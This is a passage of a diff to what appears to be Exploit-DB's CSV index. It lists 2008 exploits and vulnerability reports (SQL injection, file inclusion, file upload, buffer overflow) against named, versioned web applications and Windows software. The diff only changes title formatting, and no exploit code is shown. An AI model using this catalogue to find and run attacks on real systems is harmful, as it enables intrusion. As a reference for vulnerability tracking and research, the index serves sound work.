Vulnerability",2008-06-08,MEEKAAH,php,webapps,0 5757,platforms/php/webapps/5757.txt,"BrowserCRM 5.002.00 (clients.php) Remote File Inclusion Vulnerability",2008-06-08,ahmadbady,php,webapps,0 5758,platforms/php/webapps/5758.txt,"Galatolo Web Manager 1.0 XSS / Local File Inclusion Vulnerability",2008-06-08,StAkeR,php,webapps,0 @@ -5383,23 +5383,23 @@ id,file,description,date,author,platform,type,port 5760,platforms/php/webapps/5760.pl,"Galatolo Web Manager <= 1.0 Remote SQL Injection Exploit",2008-06-09,Stack,php,webapps,0 5761,platforms/php/webapps/5761.pl,"iJoomla News Portal (Itemid) Remote SQL Injection Exploit",2008-06-09,"ilker Kandemir",php,webapps,0 5762,platforms/php/webapps/5762.txt,"ProManager 0.73 (config.php) Local File Inclusion Vulnerability",2008-06-09,Stack,php,webapps,0 -5763,platforms/asp/webapps/5763.txt,"Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities",2008-06-09,JosS,asp,webapps,0 -5764,platforms/php/webapps/5764.txt,"Telephone Directory 2008 (SQL/XSS) Multiple Remote Vulnerabilities",2008-06-09,"CWH Underground",php,webapps,0 +5763,platforms/asp/webapps/5763.txt,"real estate web site 1.0 (sql/xss) Multiple Vulnerabilities",2008-06-09,JosS,asp,webapps,0 +5764,platforms/php/webapps/5764.txt,"telephone directory 2008 (sql/xss) Multiple Vulnerabilities",2008-06-09,"CWH Underground",php,webapps,0 5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 (article) Remote SQL Injection Vulnerability",2008-06-09,Bl@ckbe@rD,asp,webapps,0 -5766,platforms/php/webapps/5766.txt,"Realm CMS <= 2.3 Multiple Remote Vulnerabilities",2008-06-09,BugReport.IR,php,webapps,0 +5766,platforms/php/webapps/5766.txt,"realm cms <= 2.3 Multiple Vulnerabilities",2008-06-09,BugReport.IR,php,webapps,0 5767,platforms/php/webapps/5767.php,"Flux CMS <= 1.5.0 (loadsave.php) Remote Arbitrary File Overwrite Exploit",2008-06-09,EgiX,php,webapps,0 5768,platforms/php/webapps/5768.txt,"pNews 2.08 (shownews) Remote SQL Injection Vulnerability",2008-06-09,Cr@zy_King,php,webapps,0 5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0 5770,platforms/php/webapps/5770.php,"Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0 5771,platforms/php/webapps/5771.txt,"ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerabilities",2008-06-10,Unohope,php,webapps,0 5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability",2008-06-10,Unohope,php,webapps,0 -5773,platforms/php/webapps/5773.txt,"yBlog 0.2.2.2 (XSS/SQL) Multiple Remote Vulnerabilities",2008-06-10,Unohope,php,webapps,0 +5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 (xss/sql) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0 5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 (index) Remote SQL Injection Vulnerabilities",2008-06-10,Unohope,php,webapps,0 -5775,platforms/php/webapps/5775.txt,"ASPPortal Free Version (Topic_Id) Remote SQL Injection Vulnerability",2008-06-10,JosS,php,webapps,0 +5775,platforms/php/webapps/5775.txt,"ASPPortal Free Version (Topic_Id) - Remote SQL Injection Vulnerability",2008-06-10,JosS,php,webapps,0 5776,platforms/php/webapps/5776.txt,"Experts (answer.php) Remote SQL Injection Vulnerability",2008-06-10,"CWH Underground",php,webapps,0 5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin (BiAnno.ocx) Remote BOF Exploit",2008-06-10,shinnai,windows,remote,0 5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin (BiAnno.ocx) BOF Exploit (2)",2008-06-10,shinnai,windows,remote,0 -5779,platforms/php/webapps/5779.txt,"Syndeo CMS 2.6.0 (LFI/XSS) Multiple Remote Vulnerabilities",2008-06-10,"CWH Underground",php,webapps,0 +5779,platforms/php/webapps/5779.txt,"syndeo cms 2.6.0 (lfi/xss) Multiple Vulnerabilities",2008-06-10,"CWH Underground",php,webapps,0 5780,platforms/asp/webapps/5780.txt,"ASP Download 1.03 Arbitrary Change Administrator Account Vulnerability",2008-06-10,Zigma,asp,webapps,0 5781,platforms/asp/webapps/5781.txt,"Todd Woolums ASP News Management 2.2 SQL Injection Vulnerabiltiy",2008-06-10,Bl@ckbe@rD,asp,webapps,0 5782,platforms/php/webapps/5782.txt,"TNT Forum 0.9.4 Local File Inclusion Vulnerabilities",2008-06-10,"CWH Underground",php,webapps,0 @@ -5411,13 +5411,13 @@ id,file,description,date,author,platform,type,port 5788,platforms/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 Multiple SQL Injection Vulnerabilities",2008-06-11,BugReport.IR,php,webapps,0 5789,platforms/php/webapps/5789.pl,"JAMM CMS (id) Remote Blind SQL Injection Exploit",2008-06-11,n/a,php,webapps,0 5790,platforms/multiple/remote/5790.txt,"SNMPv3 HMAC validation error Remote Authentication Bypass Exploit",2008-06-12,"Maurizio Agazzini",multiple,remote,161 -5791,platforms/php/webapps/5791.txt,"Gravity Board X 2.0 Beta (SQL/XSS) Multiple Remote Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 +5791,platforms/php/webapps/5791.txt,"gravity board x 2.0 beta (sql/xss) Multiple Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC Multiple Local File Inclusion Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 5793,platforms/windows/remote/5793.html,"muvee autoProducer <= 6.1 (TextOut.dll) ActiveX Remote BOF Exploit",2008-06-12,Nine:Situations:Group,windows,remote,0 5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 (results.php) Remote SQL Injection Exploit",2008-06-12,n/a,php,webapps,0 5795,platforms/windows/remote/5795.html,"XChat <= 2.8.7b (URI Handler) Remote Code Execution Exploit (ie6/ie7)",2008-06-13,securfrog,windows,remote,0 5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection Exploit",2008-06-12,TheDefaced,php,webapps,0 -5797,platforms/php/webapps/5797.txt,"Butterfly Organizer 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities",2008-06-13,"CWH Underground",php,webapps,0 +5797,platforms/php/webapps/5797.txt,"butterfly organizer 2.0.0 (sql/xss) Multiple Vulnerabilities",2008-06-13,"CWH Underground",php,webapps,0 5798,platforms/php/webapps/5798.pl,"WebChamado 1.1 Arbitrary Add Admin Exploit",2008-06-13,"CWH Underground",php,webapps,0 5799,platforms/php/webapps/5799.pl,"Mambo Component galleries 1.0 (aid) Remote SQL Injection Exploit",2008-06-13,Houssamix,php,webapps,0 5800,platforms/php/webapps/5800.pl,"Butterfly Organizer 2.0.0 Arbitrary Delete (Category/Account) Exploit",2008-06-13,Stack,php,webapps,0 @@ -5430,7 +5430,7 @@ id,file,description,date,author,platform,type,port 5807,platforms/php/webapps/5807.txt,"PHP JOBWEBSITE PRO (JobSearch3.php) SQL Injection Vulnerability",2008-06-13,JosS,php,webapps,0 5808,platforms/php/webapps/5808.txt,"Mambo <= 4.6.4 (Output.php) Remote File Inclusion Vulnerability",2008-06-13,irk4z,php,webapps,0 5809,platforms/php/webapps/5809.txt,"Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability",2008-06-14,JosS,php,webapps,0 -5810,platforms/php/webapps/5810.txt,"Contenido 4.8.4 (RFI/XSS) Multiple Remote Vulnerabilities",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0 +5810,platforms/php/webapps/5810.txt,"contenido 4.8.4 (rfi/xss) Multiple Vulnerabilities",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0 5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 Multiple Remote SQL Injection Vulnerabilities",2008-06-14,"CWH Underground",php,webapps,0 5812,platforms/php/webapps/5812.txt,"PHPMyCart (shop.php cat) Remote SQL Injection Vulnerability",2008-06-14,n/a,php,webapps,0 5813,platforms/php/webapps/5813.txt,"Shoutcast Admin Panel 2.0 (page) Local File Inclusion Vulnerability",2008-06-14,"CWH Underground",php,webapps,0 @@ -5439,7 +5439,7 @@ id,file,description,date,author,platform,type,port 5816,platforms/php/webapps/5816.pl,"DIY (index_topic did) Blind SQL Injection Exploit",2008-06-14,Mr.SQL,php,webapps,0 5817,platforms/windows/dos/5817.pl,"Dana IRC <= 1.3 Remote Buffer Overflow PoC",2008-06-14,t0pP8uZz,windows,dos,0 5818,platforms/php/webapps/5818.txt,"xeCMS <= 1.0.0 RC2 Insecure Cookie Handling Vulnerability",2008-06-14,t0pP8uZz,php,webapps,0 -5819,platforms/php/webapps/5819.txt,"EZCMS <= 1.2 (bSQL/Admin Byapss) Multiple Remote Vulnerabilities",2008-06-14,t0pP8uZz,php,webapps,0 +5819,platforms/php/webapps/5819.txt,"ezcms <= 1.2 (bsql/admin byapss) Multiple Vulnerabilities",2008-06-14,t0pP8uZz,php,webapps,0 5820,platforms/php/webapps/5820.txt,"PHPEasyNews <= 1.13 RC2 (post) Remote SQL Injection Vulnerability",2008-06-14,t0pP8uZz,php,webapps,0 5821,platforms/php/webapps/5821.txt,"AlstraSoft AskMe Pro <= 2.1 Multiple SQL Injection Vulnerabilities",2008-06-14,t0pP8uZz,php,webapps,0 5822,platforms/php/webapps/5822.txt,"Devalcms 1.4a (currentfile) Local File Inclusion Vulnerability",2008-06-15,"CWH Underground",php,webapps,0 @@ -5453,7 +5453,7 @@ id,file,description,date,author,platform,type,port 5831,platforms/php/webapps/5831.txt,"Open Azimyt CMS <= 0.22 (lang) Local File Inclusion Vulnerability",2008-06-16,DSecRG,php,webapps,0 5832,platforms/php/webapps/5832.pl,"MyMarket 1.72 Blind SQL Injection Exploit",2008-06-16,n/a,php,webapps,0 5833,platforms/php/webapps/5833.txt,"Joomla Simple Shop Galore Component 3.x (catid) SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0 -5834,platforms/php/webapps/5834.pl,"Comparison Engine Power 1.0 Blind SQL Injection Exploit",2008-06-17,Mr.SQL,php,webapps,0 +5834,platforms/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection Exploit",2008-06-17,Mr.SQL,php,webapps,0 5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 (index.php Id) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0 5836,platforms/php/webapps/5836.txt,"BaSiC-CMS (index.php r) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0 5837,platforms/windows/local/5837.c,"Deterministic Network Enhancer dne2000.sys kernel ring0 SYSTEM exploit",2008-06-17,mu-b,windows,local,0 @@ -5467,7 +5467,7 @@ id,file,description,date,author,platform,type,port 5845,platforms/php/webapps/5845.txt,"MyShoutPro 1.2 Final Insecure Cookie Handling Vulnerability",2008-06-17,Stack,php,webapps,0 5846,platforms/php/webapps/5846.txt,"eroCMS <= 1.4 (index.php site) SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0 5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability",2008-06-17,Cr@zy_King,php,webapps,0 -5848,platforms/php/webapps/5848.txt,"Traindepot 0.1 (LFI/XSS) Multiple Remote Vulnerabilities",2008-06-18,"CWH Underground",php,webapps,0 +5848,platforms/php/webapps/5848.txt,"traindepot 0.1 (lfi/xss) Multiple Vulnerabilities",2008-06-18,"CWH Underground",php,webapps,0 5849,platforms/asp/webapps/5849.txt,"doITlive CMS <= 2.50 (SQL Injection/XSS) Multiple Vulnerabilities",2008-06-18,BugReport.IR,asp,webapps,0 5850,platforms/php/webapps/5850.txt,"AspWebCalendar 2008 Remote File Upload Vulnerability",2008-06-18,Alemin_Krali,php,webapps,0 5851,platforms/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 vb6skit.dll Buffer Overflow PoC",2008-06-18,shinnai,windows,dos,0 @@ -5475,11 +5475,11 @@ id,file,description,date,author,platform,type,port 5853,platforms/php/webapps/5853.txt,"Maxtrade AIO 1.3.23 (categori) Remote SQL Injection Vulnerability",2008-06-18,HaCkeR_EgY,php,webapps,0 5854,platforms/php/webapps/5854.txt,"Mybizz-Classifieds (index.php cat) SQL Injection Vulnerability",2008-06-18,HaCkeR_EgY,php,webapps,0 5855,platforms/php/webapps/5855.txt,"Easy Webstore 1.2 (index.php postid) Remote SQL Injection Vulnerability",2008-06-18,Mr.SQL,php,webapps,0 -5856,platforms/php/webapps/5856.txt,"nweb2fax <= 0.2.7 Multiple Remote Vulnerabilities",2008-06-18,dun,php,webapps,0 +5856,platforms/php/webapps/5856.txt,"nweb2fax <= 0.2.7 Multiple Vulnerabilities",2008-06-18,dun,php,webapps,0 5857,platforms/php/webapps/5857.txt,"Carscripts Classifieds (index.php cat) Remote SQL Injection Vulnerability",2008-06-18,Stack,php,webapps,0 5858,platforms/php/webapps/5858.txt,"BoatScripts Classifieds (index.php type) SQL Injection Vulnerability",2008-06-18,Stack,php,webapps,0 5859,platforms/php/webapps/5859.txt,"eLineStudio Site Composer (ESC) <= 2.6 Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps,0 -5860,platforms/php/webapps/5860.txt,"OwnRS Blog beta3 (SQL/XSS) Multiple Remote Vulnerabilities",2008-06-19,"CWH Underground",php,webapps,0 +5860,platforms/php/webapps/5860.txt,"ownrs blog beta3 (sql/xss) Multiple Vulnerabilities",2008-06-19,"CWH Underground",php,webapps,0 5861,platforms/php/webapps/5861.txt,"Academic Web Tools CMS <= 1.4.2.8 Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps,0 5862,platforms/php/webapps/5862.txt,"samart-cms 2.0 (contentsid) Remote SQL Injection Vulnerability",2008-06-19,dun,php,webapps,0 5863,platforms/php/webapps/5863.txt,"CMS-BRD (menuclick) Remote SQL Injection Vulnerability",2008-06-19,dun,php,webapps,0 @@ -5488,23 +5488,23 @@ id,file,description,date,author,platform,type,port 5866,platforms/php/webapps/5866.txt,"Lotus Core CMS 1.0.1 Remote File Inclusion Vulnerabilities",2008-06-19,Ciph3r,php,webapps,0 5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 (cate_id) SQL Injection Vulnerability",2008-06-19,"Hussin X",php,webapps,0 5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - (id) Remote SQL Injection Vulnerability",2008-06-19,"Hussin X",php,webapps,0 -5869,platforms/php/webapps/5869.txt,"Virtual Support Office-XP <= 3.0.29 Multiple Remote Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 -5870,platforms/php/webapps/5870.txt,"GL-SH Deaf Forum <= 6.5.5 Multiple Remote Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 +5869,platforms/php/webapps/5869.txt,"virtual support office-xp <= 3.0.29 Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 +5870,platforms/php/webapps/5870.txt,"gl-sh deaf forum <= 6.5.5 Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 (index.php page) Local File Inclusion Vulnerability",2008-06-20,cOndemned,php,webapps,0 5872,platforms/php/webapps/5872.txt,"FubarForum 1.5 (index.php page) Local File Inclusion Vulnerability",2008-06-20,cOndemned,php,webapps,0 -5873,platforms/php/webapps/5873.txt,"Lightweight News Portal [LNP] 1.0b Multiple Remote Vulnerabilities",2008-06-20,storm,php,webapps,0 +5873,platforms/php/webapps/5873.txt,"lightweight news portal [lnp] 1.0b Multiple Vulnerabilities",2008-06-20,storm,php,webapps,0 5874,platforms/php/webapps/5874.txt,"IPTBB 0.5.6 (index.php act) Local File Inclusion Vulnerability",2008-06-20,storm,php,webapps,0 5875,platforms/php/webapps/5875.txt,"CiBlog 3.1 (links-extern.php id) Remote SQL Injection Vulnerability",2008-06-20,Mr.SQL,php,webapps,0 5876,platforms/php/webapps/5876.txt,"Jamroom 3.3.5 Remote File Inclusion Vulnerabilities",2008-06-20,Cyberlog,php,webapps,0 -5877,platforms/php/webapps/5877.txt,"JaxUltraBB <= 2.0 (LFI/XSS) Multiple Remote Vulnerabilities",2008-06-20,"CWH Underground",php,webapps,0 +5877,platforms/php/webapps/5877.txt,"jaxultrabb <= 2.0 (lfi/xss) Multiple Vulnerabilities",2008-06-20,"CWH Underground",php,webapps,0 5878,platforms/php/webapps/5878.txt,"emuCMS 0.3 (cat_id) Remote SQL Injection Vulnerability",2008-06-20,TurkishWarriorr,php,webapps,0 5879,platforms/php/webapps/5879.txt,"PHPAuction (profile.php user_id) Remote SQL Injection Vulnerability",2008-06-20,Mr.SQL,php,webapps,0 -5880,platforms/php/webapps/5880.txt,"SiteXS CMS 0.1.1 (Upload/XSS) Multiple Remote Vulnerabilities",2008-06-21,"CWH Underground",php,webapps,0 +5880,platforms/php/webapps/5880.txt,"sitexs cms 0.1.1 (upload/xss) Multiple Vulnerabilities",2008-06-21,"CWH Underground",php,webapps,0 5881,platforms/php/webapps/5881.txt,"@CMS 2.1.1 (readarticle.php article_id) SQL Injection Vulnerability",2008-06-21,Mr.SQL,php,webapps,0 5882,platforms/php/webapps/5882.txt,"eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability",2008-06-21,"ilker Kandemir",php,webapps,0 5883,platforms/php/webapps/5883.txt,"PHP KnowledgeBase Script 2.4 (cat_id) SQL Injection Vulnerability",2008-06-21,"S.L TEAM",php,webapps,0 5884,platforms/php/webapps/5884.txt,"Aprox CMS Engine 5 (1.0.4) - Local File Inclusion Vulnerability",2008-06-21,SkyOut,php,webapps,0 -5885,platforms/php/webapps/5885.pl,"Scientific Image DataBase <= 0.41 Blind SQL Injection Exploit",2008-06-21,t0pP8uZz,php,webapps,0 +5885,platforms/php/webapps/5885.pl,"Scientific Image DataBase <= 0.41 - Blind SQL Injection Exploit",2008-06-21,t0pP8uZz,php,webapps,0 5886,platforms/php/webapps/5886.pl,"LaserNet CMS <= 1.5 Arbitrary File Upload Exploit",2008-06-21,t0pP8uZz,php,webapps,0 5887,platforms/php/webapps/5887.pl,"LE.CMS <= 1.4 Remote Arbitrary File Upload Exploit",2008-06-21,t0pP8uZz,php,webapps,0 5888,platforms/php/webapps/5888.txt,"CCLeague Pro <= 1.2 Insecure Cookie Authentication Vulnerability",2008-06-21,t0pP8uZz,php,webapps,0 @@ -5513,7 +5513,7 @@ id,file,description,date,author,platform,type,port 5892,platforms/php/webapps/5892.txt,"phpAuction 3.2.1 (item.php id) Remote SQL Injection Vulnerability",2008-06-21,"Hussin X",php,webapps,0 5893,platforms/php/webapps/5893.txt,"Joomla Component EXP Shop (catid) SQL Injection Vulnerability",2008-06-22,His0k4,php,webapps,0 5894,platforms/asp/webapps/5894.txt,"DUdForum 3.0 (forum.asp iFor) Remote SQL Injection Vulnerability",2008-06-22,Bl@ckbe@rD,asp,webapps,0 -5895,platforms/php/webapps/5895.txt,"sHibby sHop <= 2.2 (SQL/Update) Multiple Remote Vulnerabilities",2008-06-22,KnocKout,php,webapps,0 +5895,platforms/php/webapps/5895.txt,"shibby shop <= 2.2 (sql/update) Multiple Vulnerabilities",2008-06-22,KnocKout,php,webapps,0 5896,platforms/php/webapps/5896.txt,"CMS Mini 0.2.2 Multiple Local File Inclusion Vulnerabilities",2008-06-22,"CWH Underground",php,webapps,0 5897,platforms/php/webapps/5897.txt,"phpDMCA 1.0.0 Multiple Remote File Inclusion Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0 5898,platforms/php/webapps/5898.pl,"IGSuite 3.2.4 (reverse shell) Blind SQL Injection Exploit",2008-06-22,"Guido Landi",php,webapps,0 @@ -5523,8 +5523,8 @@ id,file,description,date,author,platform,type,port 5902,platforms/php/webapps/5902.txt,"HoMaP-CMS 0.1 (plugin_admin.php) Remote File Inclusion Vulnerability",2008-06-22,CraCkEr,php,webapps,0 5903,platforms/php/webapps/5903.txt,"HomePH Design 2.10 RC2 (RFI/LFI/XSS) Multiple Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0 5904,platforms/php/webapps/5904.txt,"Hedgehog-CMS 1.21 (header.php) Local File Inclusion Vulnerability",2008-06-22,CraCkEr,php,webapps,0 -5905,platforms/php/webapps/5905.txt,"CMReams CMS 1.3.1.1 Beta2 (LFI/XSS) Multiple Remote Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0 -5906,platforms/php/webapps/5906.txt,"ODARS CMS 1.0.2 Remote File Inclusion Vulnerability",2008-06-22,CraCkEr,php,webapps,0 +5905,platforms/php/webapps/5905.txt,"cmreams cms 1.3.1.1 beta2 (lfi/xss) Multiple Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0 +5906,platforms/php/webapps/5906.txt,"odars cms 1.0.2 - Remote File Inclusion Vulnerability",2008-06-22,CraCkEr,php,webapps,0 5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 5908,platforms/php/webapps/5908.txt,"HoMaP-CMS 0.1 (index.php go) Remote SQL Injection Vulnerability",2008-06-23,SxCx,php,webapps,0 5909,platforms/php/webapps/5909.pl,"BlogPHP 2.0 Remote Privilege Escalation Exploit",2008-06-23,Cod3rZ,php,webapps,0 @@ -5535,10 +5535,10 @@ id,file,description,date,author,platform,type,port 5914,platforms/php/webapps/5914.txt,"Demo4 CMS (index.php id) Remote SQL Injection Vulnerability",2008-06-23,"CWH Underground",php,webapps,0 5915,platforms/php/webapps/5915.txt,"Joomla Component com_facileforms 1.4.4 RFI Vulnerability",2008-06-23,Kacak,php,webapps,0 5916,platforms/php/webapps/5916.txt,"Dagger CMS 2008 (dir_inc) Remote File Inclusion Vulnerability",2008-06-23,CraCkEr,php,webapps,0 -5917,platforms/php/webapps/5917.txt,"TinX CMS 1.1 (LFI/XSS) Multiple Remote Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 +5917,platforms/php/webapps/5917.txt,"tinx cms 1.1 (lfi/xss) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 5918,platforms/windows/dos/5918.pl,"uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit",2008-06-23,Exodus,windows,dos,0 -5919,platforms/php/webapps/5919.txt,"MM Chat 1.5 (LFI/XSS) Multiple Remote Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 -5920,platforms/php/webapps/5920.txt,"Ourvideo CMS 9.5 (RFI/LFI/XSS) Multiple Remote Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 +5919,platforms/php/webapps/5919.txt,"mm chat 1.5 (lfi/xss) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 +5920,platforms/php/webapps/5920.txt,"ourvideo cms 9.5 (rfi/lfi/xss) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 (mod_root) Remote File Inclusion Vulnerability",2008-06-23,CraCkEr,php,webapps,0 5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 @@ -5559,7 +5559,7 @@ id,file,description,date,author,platform,type,port 5938,platforms/php/webapps/5938.php,"PHPmotion <= 2.0 (update_profile.php) Remote Shell Upload Exploit",2008-06-25,EgiX,php,webapps,0 5939,platforms/php/webapps/5939.txt,"Joomla Component netinvoice 1.2.0 SP1 SQL Injection Vulnerability",2008-06-25,His0k4,php,webapps,0 5940,platforms/php/webapps/5940.txt,"Keller Web Admin CMS 0.94 Pro Local File Inclusion Vulnerability",2008-06-26,"CWH Underground",php,webapps,0 -5941,platforms/php/webapps/5941.txt,"PolyPager <= 1.0rc2 (SQL/XSS) Multiple Remote Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0 +5941,platforms/php/webapps/5941.txt,"polypager <= 1.0rc2 (sql/xss) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0 5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax <= 4.42 (category) SQL Injection Vulnerability",2008-06-26,boom3rang,php,webapps,0 5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 Multiple Local File Inclusion Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0 5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0 @@ -5573,12 +5573,12 @@ id,file,description,date,author,platform,type,port 5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts NMS Insecure Cookie Handling Vulnerability",2008-06-26,"Virangar Security",php,webapps,0 5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 (params.php) Remote File Inclusion Vulnerability",2008-06-26,Ciph3r,php,webapps,0 5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro Local File Inclusion Vulnerability (1st)",2008-06-26,StAkeR,php,webapps,0 -5957,platforms/php/webapps/5957.txt,"OTManager CMS 24a (LFI/XSS) Multiple Remote Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0 -5958,platforms/php/webapps/5958.txt,"W1L3D4 Philboard 1.2 (Blind SQL/XSS) Multiple Remote Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0 +5957,platforms/php/webapps/5957.txt,"otmanager cms 24a (lfi/xss) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0 +5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 (blind sql/xss) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0 5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 Insecure Cookie Handling Vulnerability",2008-06-27,"Virangar Security",php,webapps,0 5960,platforms/php/webapps/5960.txt,"SePortal 2.4 (poll.php poll_id) Remote SQL Injection Vulnerability",2008-06-27,Mr.SQL,php,webapps,0 5961,platforms/php/webapps/5961.txt,"PHP-Fusion Mod classifieds (lid) Remote SQL Injection Vulnerability",2008-06-27,boom3rang,php,webapps,0 -5962,platforms/php/webapps/5962.txt,"PowerAward 1.1.0 RC1 (LFI /XSS) Multiple Remote Vulnerabilities",2008-06-28,CraCkEr,php,webapps,0 +5962,platforms/php/webapps/5962.txt,"poweraward 1.1.0 rc1 (lfi /xss) Multiple Vulnerabilities",2008-06-28,CraCkEr,php,webapps,0 5963,platforms/php/webapps/5963.txt,"Joomla Component jabode (id) Remote SQL Injection Vulnerability",2008-06-28,His0k4,php,webapps,0 5964,platforms/php/webapps/5964.txt,"Online Booking Manager 2.2 (id) SQL Injection Vulnerability",2008-06-28,"Hussin X",php,webapps,0 5965,platforms/php/webapps/5965.txt,"Joomla Component beamospetition Remote SQL Injection Vulnerability",2008-06-28,His0k4,php,webapps,0 @@ -5593,7 +5593,7 @@ id,file,description,date,author,platform,type,port 5974,platforms/php/webapps/5974.txt,"Catviz 0.4.0 beta1 Multiple Remote SQL Injection Vulnerabilities",2008-06-30,n/a,php,webapps,0 5975,platforms/php/webapps/5975.txt,"myBloggie 2.1.6 Multiple Remote SQL Injection Vulnerabilities",2008-06-30,"Jesper Jurcenoks",php,webapps,0 5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x (catalogue.php cat) Remote SQL Injection Exploit",2008-06-30,n0c0py,php,webapps,0 -5977,platforms/php/webapps/5977.txt,"pSys v0.7.0 Alpha (chatbox.php) Remote SQL Injection Vulnerability",2008-06-30,DNX,php,webapps,0 +5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - (chatbox.php) Remote SQL Injection Vulnerability",2008-06-30,DNX,php,webapps,0 5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 (FIRST ANIMATED EXPLOIT) Local Root Exploit (vga)",2008-07-01,"lul-disclosure inc.",openbsd,local,0 5980,platforms/php/webapps/5980.txt,"Mambo Component n-gallery Multiple SQL Injection Vulnerabilities",2008-06-30,AlbaniaN-[H],php,webapps,0 5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 (hm) Remote File Inclusion Vulnerability",2008-06-30,"Ghost Hacker",php,webapps,0 @@ -5626,7 +5626,7 @@ id,file,description,date,author,platform,type,port 6008,platforms/php/webapps/6008.php,"ImperialBB <= 2.3.5 Remote File Upload Exploit",2008-07-05,PHPLizardo,php,webapps,0 6009,platforms/php/webapps/6009.pl,"fuzzylime cms 3.01 Remote Command Execution Exploit",2008-07-05,Ams,php,webapps,0 6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 (uid) Remote SQL Injection Vulnerability",2008-07-06,"HIva Team",php,webapps,0 -6011,platforms/php/webapps/6011.txt,"ContentNow 1.4.1 (Upload/XSS) Multiple Remote Vulnerabilities",2008-07-06,"CWH Underground",php,webapps,0 +6011,platforms/php/webapps/6011.txt,"contentnow 1.4.1 (upload/xss) Multiple Vulnerabilities",2008-07-06,"CWH Underground",php,webapps,0 6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 (CMailCOM.dll) Remote SEH Overwrite Exploit",2008-07-06,Nine:Situations:Group,windows,remote,80 6013,platforms/osx/remote/6013.pl,"Safari + Quicktime <= 7.3 RTSP Content-Type Remote BOF Exploit",2008-07-06,krafty,osx,remote,0 